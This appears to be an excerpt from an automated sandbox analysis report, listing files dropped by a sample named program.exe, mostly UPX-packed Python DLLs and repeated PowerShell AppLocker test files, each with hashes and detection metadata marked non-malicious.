                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):659216
                                                                                                                                                                                                                                            Entropy (8bit):7.993010988331354
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
                                                                                                                                                                                                                                            MD5:21AEA45D065ECFA10AB8232F15AC78CF
                                                                                                                                                                                                                                            SHA1:6A754EB690FF3C7648DAE32E323B3B9589A07AF2
                                                                                                                                                                                                                                            SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
                                                                                                                                                                                                                                            SHA-512:D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):267024
                                                                                                                                                                                                                                            Entropy (8bit):7.9826656358602595
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
                                                                                                                                                                                                                                            MD5:B2712B0DD79A9DAFE60AA80265AA24C3
                                                                                                                                                                                                                                            SHA1:347E5AD4629AF4884959258E3893FDE92EB3C97E
                                                                                                                                                                                                                                            SHA-256:B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
                                                                                                                                                                                                                                            SHA-512:4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gjhi2b4.i44.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0spkeay3.1v0.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12lmqb2h.day.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hucegdl.au0.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jjnzx3d.l23.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5enuemgo.5vu.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zhzkef5.aj2.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cegibygv.dnv.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqzv32vr.v0b.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqtnop5n.oub.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_es41h2at.0x1.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ex51dusm.xat.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fb3qdlf4.jsv.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iw0dyzfo.bek.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxxgklel.xqo.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mx5obfuv.fw3.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxljg0ix.jxi.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4w54ega.i4r.ps1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvzw3qhf.sp2.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swhmdhtr.1pp.psm1

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
